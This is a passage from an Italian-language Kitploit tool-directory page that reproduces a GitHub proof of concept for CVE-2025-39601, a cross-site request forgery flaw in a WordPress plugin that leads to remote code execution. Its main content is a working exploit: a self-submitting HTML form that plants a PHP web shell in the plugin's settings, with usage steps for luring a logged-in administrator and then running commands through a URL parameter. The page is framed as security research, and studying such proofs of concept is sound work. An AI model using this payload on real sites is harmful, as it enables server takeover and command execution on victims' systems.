Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-39601 — Plugin WordPress Custom CSS, JS & PHP <= 2.4.1 - Vulnerabilità da CSRF a RCE | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-39601
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-39601

CVE-2025-39601

Plugin WordPress Custom CSS, JS & PHP <= 2.4.1 - Vulnerabilità da CSRF a RCE

Vedi Repository
151 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2025-39601 - CSRF a RCE nel plugin WordPress Custom CSS, JS & PHP <= 2.4.1

🧠 Descrizione

Una vulnerabilità Cross-Site Request Forgery (CSRF) nel plugin WPFactory Custom CSS, JS & PHP consente Remote Code Execution (RCE) tramite l'iniezione di codice PHP malevolo via richieste POST non autorizzate.
Ciò interessa tutte le versioni fino alla 2.4.1 inclusa.

  • CVE ID: CVE-2025-39601
  • Pubblicato: 2025-04-16
  • Aggiornato: 2025-04-16
  • Gravità: 🔥 9.6 (CRITICO)
  • CWE: CWE-352 - Cross-Site Request Forgery
  • Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🖼️ Prova Visiva

Di seguito uno screenshot che mostra il risultato di uno sfruttamento riuscito, dimostrando come il codice remoto può essere eseguito tramite il parametro URL:

Nxploited


Nxploited


💥 Prova di Concetto (PoC)

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
    <h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
    <p>By : Nxploited | Khaled Alenazi</p>
    <form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
        <input type="hidden" name="alg_custom_css_php_enabled" value="1">
        <input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
        <input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="alg_ccjp_submit" value="php">
        <noscript><input type="submit" value="Submit"></noscript>
    </form>
</body>
</html>

🧪 Utilizzo

  1. Ospita il file HTML sopra su un server esterno o in un ambiente locale.
  2. Mentre un utente amministratore è loggato, visita il file HTML ospitato nel suo browser.
  3. Questo invierà silenziosamente il modulo e inietterà codice PHP nelle impostazioni del plugin.
  4. Il codice viene quindi eseguito automaticamente ad ogni caricamento della pagina tramite l'hook plugins_loaded.
  5. Esempio di esecuzione:
    root@kitploit:~
    http://target-site.com/?cmd=whoami
    

⚠️ Disclaimer

Questa PoC è solo a scopo educativo.
L'autore non è responsabile per qualsiasi uso improprio o danno causato dall'applicazione inappropriata di queste informazioni.
Testare sempre in ambienti controllati e con autorizzazione.


By: Nxploited | Khaled Alenazi

Scarica lo strumento